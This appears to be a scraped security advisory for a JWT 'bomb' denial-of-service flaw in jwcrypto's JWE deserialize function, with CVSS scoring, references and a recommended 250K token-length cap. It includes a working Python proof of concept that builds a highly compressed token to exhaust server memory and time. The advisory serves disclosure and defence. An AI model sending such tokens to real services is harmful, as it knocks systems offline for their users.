Lucene search

GitHub Advisory DatabaseGHSA-J857-7RVV-VJ97

HistoryMar 06, 2024 - 8:00 p.m.

JWCrypto vulnerable to JWT bomb Attack in `deserialize` function

2024-03-0620:00:56

CWE-770

GitHub Advisory Database

github.com

jwcrypto

jwt bomb attack

dos attack

jwe token

high compression ratio

memory consumption

processing time

vulnerability

mitigation

microsoft azure

system.identitymodel.tokens.jwt

cve-2024-21319

CVSS3

6.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

HIGH

User Interaction

NONE

Scope

CHANGED

Confidentiality Impact

NONE

Integrity Impact

NONE

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:N/I:N/A:H

AI Score

5.9

Confidence

High

EPSS

0.001

Percentile

32.9%

JSON

Affected version

Vendor: https://github.com/latchset/jwcrypto
Version: 1.5.5

Description

An attacker can cause a DoS attack by passing in a malicious JWE Token with a high compression ratio.
When the server processes this Token, it will consume a lot of memory and processing time.

Poc

from jwcrypto import jwk, jwe
from jwcrypto.common import json_encode, json_decode
import time
public_key = jwk.JWK()
private_key = jwk.JWK.generate(kty='RSA', size=2048)
public_key.import_key(**json_decode(private_key.export_public()))


payload = '{"u": "' + "u" * 400000000 + '", "uu":"' + "u" * 400000000 + '"}'
protected_header = {
    "alg": "RSA-OAEP-256",
    "enc": "A256CBC-HS512",
    "typ": "JWE",
    "zip": "DEF",
    "kid": public_key.thumbprint(),
}
jwetoken = jwe.JWE(payload.encode('utf-8'),
                   recipient=public_key,
                   protected=protected_header)
enc = jwetoken.serialize(compact=True)

print("-----uncompress-----")

print(len(enc))

begin = time.time()

jwetoken = jwe.JWE()
jwetoken.deserialize(enc, key=private_key)

print(time.time() - begin)

print("-----compress-----")

payload = '{"u": "' + "u" * 400000 + '", "uu":"' + "u" * 400000 + '"}'
protected_header = {
    "alg": "RSA-OAEP-256",
    "enc": "A256CBC-HS512",
    "typ": "JWE",
    "kid": public_key.thumbprint(),
}
jwetoken = jwe.JWE(payload.encode('utf-8'),
                   recipient=public_key,
                   protected=protected_header)
enc = jwetoken.serialize(compact=True)

print(len(enc))

begin = time.time()

jwetoken = jwe.JWE()
jwetoken.deserialize(enc, key=private_key)

print(time.time() - begin)

It can be found that when processing Tokens with similar lengths, the processing time of compressed tokens is significantly longer.
<img width=“172” alt=“image” src=“https://github.com/latchset/jwcrypto/assets/133195620/23193327-3cd7-499a-b5aa-28c56af92785”>

Mitigation

To mitigate this vulnerability, it is recommended to limit the maximum token length to 250K. This approach has also
been adopted by the JWT library System.IdentityModel.Tokens.Jwt used in Microsoft Azure [1], effectively preventing
attackers from exploiting this vulnerability with high compression ratio tokens.

References

[1] CVE-2024-21319

Affected configurations

Vulners

Node

jwcrypto_projectjwcryptoRange≤1.5.5

VendorProductVersionCPE
jwcrypto_projectjwcrypto*cpe:2.3:a:jwcrypto_project:jwcrypto:*:*:*:*:*:*:*:*

Vendor	Product	Version	CPE
jwcrypto_project	jwcrypto	*	cpe:2.3:a:jwcrypto_project:jwcrypto::::::::

References

github.com/advisories/GHSA-j857-7rvv-vj97

github.com/latchset/jwcrypto/commit/90477a3b6e73da69740e00b8161f53fea19b831f

github.com/latchset/jwcrypto/security/advisories/GHSA-j857-7rvv-vj97

nvd.nist.gov/vuln/detail/CVE-2024-28102

CVSS3

6.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

HIGH

User Interaction

NONE

Scope

CHANGED

Confidentiality Impact

NONE

Integrity Impact

NONE

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:N/I:N/A:H

AI Score

5.9

Confidence

High

EPSS

0.001

Percentile

32.9%

JSON

Related for GHSA-J857-7RVV-VJ97